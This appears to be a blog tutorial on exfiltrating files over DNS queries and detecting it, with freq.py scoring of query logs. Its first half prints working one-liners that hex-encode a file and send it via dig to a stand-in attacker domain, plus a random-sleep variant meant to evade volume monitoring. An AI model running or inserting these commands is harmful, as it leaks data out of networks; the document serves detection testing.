Exfil with DNS


Exfiltrating Data with DNS

Using DNS to exfiltrate information from a network is likely to be one of the least performant and easily detected methods available to a malicious actor. It is however very easy to execute. It is also very likely to be successful in the short term. So it's worth being aware of how it could be done.

What is Exfil or Exfiltration?

Exfiltration of data is the process of exporting information from within a network, to an external source. In this case, its a malicious user extracting something from your network to theirs. Typically, this export needs to be hidden, at least for the duration of the export, so that perimeter controls can't stop it.

How is it done?

I'll use simple tools to prove the concept so you can test your detection methods, but a miscreant is unlikely to use the same tools. More likely a malware toolkit will do all the encoding and will generate the destination based on an algorithm.

These methods are equally possible in Windows and Linux. It's just easier to show and test using Linux. Here is the easiest way of getting data out of a network using DNS queries:

1# exfil in a single line
2for label in $(xxd -p path-to-file); do dig ${label}.evil.example.com @evil-host.example.com; done

Voila! Reversible hex encoded data goes flying out of your network to the evil doer's servers. Of course most networks will block direct DNS traffic so you may need to use your local resolvers. But more on that later. The bitrate per DNS query is low. You can use the '-c 31' option to ensure that each line contains 62 characters (31 bytes of the original file), thus maximising your output. But you are still going to generate a lot of DNS queries, even for small files.

Detect High Volume of Queries

So we know that looking for an unusually high number of queries from a host might indicate exfiltration.

Knowing who your (DNS) top talkers are within your network is therefore important. A host which generally doesn't generate a lot of queries, suddenly generating hundreds or even thousands of outbound queries is worth investigating.

Hiding in Plain Sight

One very simple method of masking all those queries is to send them via the internal resolver. There'll be lots of legitimate queries from other users so maybe no one notices the spike from the exfiltrating host. So I'll remove @evil-host.example.com from the above command.

This does mean that edge network devices are less capable of detecting the exfil traffic and now the organisation is reliant on detecting it on an internal system. And everyone knows that internal systems are safe because of the big firewall at the network edge, so no need for trend monitoring on that resolver, right? As with perimeter monitoring, if you keep a baseline history of top talkers, you should investigate suddenly high volumes from previously quiet hosts.

What About "sleep 60"?

If I know or suspect someone is looking for exfil traffic, why wouldn't I just sleep between lookups? Rather than a fixed sleep time, I'll make it random. There's a balance here. I do want to exfil data in a timely fashion. I'll still need to generate lots of queries over a time frame of hours or maybe a day or two. So now I have:

1for label in $(xxd -p path-to-file); do dig ${label}.evil.example.com;\
2sleep $((( RANDOM % 60 ))); done

But there's still all that traffic going to one domain.

DGAs Are The Future

Domain Generation Algorithms have been around since Conficker B. Some are sophisticated, some not so. For this post, I don't care about the algorithm, only that my exfil traffic is no longer going to one domain. Of course, if all your evil domains happen to be in one or two TLDs because those are cheap, the traffic will still be obvious.

But Those Labels Don't Look Legit To Me

We can hide the volume of traffic somewhat, we can vary the destination, but domains generated by a DGA and those labels generated by our hex encoder are obviously unusual. At least they are to a human. Surely there is a command line tool we can use that looks at a string and says "A human would think this string is unusual"?

One thing we can't do is look for entropy in strings, since legitimate domains and host labels can have random values in them. Instead, I'm going to use the tool freq.py to find collections of strings that are not common in domains.

The one liner below extracts the queried domain and pipes it through to freq.py for measurement against its likelihood of existing amongst legitimate queries. The lower the numeric output from freq, the more likely the domain contains unusual or unexpected text (not randomness).

1for domain in $(awk '{print $8}' /var/log/named/query.log); \
2do score=$(./freq.py -m "${domain}" freq2018.freq | \
3sed 's/[\(,\)]//g'| awk '{print $2}'); \
4if (( $(echo "${score} < 1"| bc) ));\
5then echo "${domain}:${score}"; fi;done

Some More About freq.py

I've used the default frequency file found in its github repo, but you can create your own file and populate it with data which is normal for you. I've used freq's second measurement value which I've found to be a little more representative of what is normal and what is abnormal. Remember that you want freq to detect encoded data, not malicious domains. So you should be able to feed it (-f) with your standard query logs without having to manipulate or curate their content.

First we need to create a new file that will only contain queried domains which are normal for our network. The larger the data set the more effective freq will be, so be sure to add as many weeks or months worth of data that you can.

Creating a new frequency file

1./freq.py -c common_domains.freq

Let's collect some queried domain names and store them in a file.

1awk '{print $8}' /var/log/named/query.log > baseline_queries.txt

Now we feed the baseline data to freq to create our frequency table

1./freq.py -f common_domains.freq

You can add a single entry (-n) and specify a frequency of occurance (-w)

1./freq.py -n "totally.legit.example.com" -w 30000 common_domains.freq

If you've collected some more domains, you can update the table

1./freq.py -f more_queries.txt


The method for exfiltrating data was inspired by this post (also contains a Windows method): detecting-data-exfiltraton-via-dns-queries

Mark Baggett's freq.py has several github pages, but this one has the most recent commits and was the version I used: freq.py

There's a write up about using freq.py in more detail here: wiki.sans.blue